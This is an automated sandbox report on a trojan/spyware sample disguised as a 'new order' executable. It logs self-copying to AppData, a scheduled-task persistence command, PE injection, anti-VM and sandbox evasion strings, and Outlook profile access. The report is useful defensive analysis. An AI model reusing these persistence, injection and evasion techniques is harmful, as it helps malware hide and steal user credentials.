                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.293338597.0000000006F70000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.518319405.0000000000ABC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVHbIB.exe8 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameuhljaIlIyVxZXxXUzeXkqULlxd.exe4 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeBinary or memory string: OriginalFilenameVHbIB.exe8 vs new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: aUkURZiJ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeReversingLabs: Detection: 41%
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile read: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeJump to behavior
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe "C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe"
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe {path}
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmpJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe {path}Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile created: C:\Users\user\AppData\Roaming\aUkURZiJ.exeJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile created: C:\Users\user\AppData\Local\Temp\tmp8923.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/3@1/1
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_01
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeMutant created: \Sessions\1\BaseNamedObjects\qhBPaQtUSZKpqqGhtcCkqEcA
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0028376A push ebp; retf 0_2_0028376B
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_00A3376A push ebp; retf 5_2_00A3376B
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_01127A37 push edi; retn 0000h5_2_01127A39
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011EBA50 pushfd ; retf 5_2_011EBDB9
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_0138E333 push eax; ret 5_2_0138E349
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_0138D95C push eax; ret 5_2_0138D95D
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: 0xAC6B97B1 [Wed Aug 31 16:45:37 2061 UTC]
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.63105429026
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.63105429026
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile created: \new order tricolor-6.45 tricolor-6.3 tricolor-8.1 tricolor-7.66.......exe
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | File created: C:\Users\user\AppData\Roaming\aUkURZiJ.exe

                      Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.2799e98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4252, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe TID: 4072 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe TID: 3280 | Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe TID: 1844 | Thread sleep count: 3411 > 30
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe TID: 1844 | Thread sleep count: 6409 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Window / User API: threadDelayed 3411
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Window / User API: threadDelayed 6409
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Thread delayed: delay time: 922337203685477
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.520645254.00000000010ED000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Code function: 5_2_0112DFD8 LdrInitializeThunk, 5_2_0112DFD8
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Memory written: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Process created: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe {path}
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.522249970.00000000017A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.522249970.00000000017A0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.522249970.00000000017A0000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.522249970.00000000017A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.522249970.00000000017A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
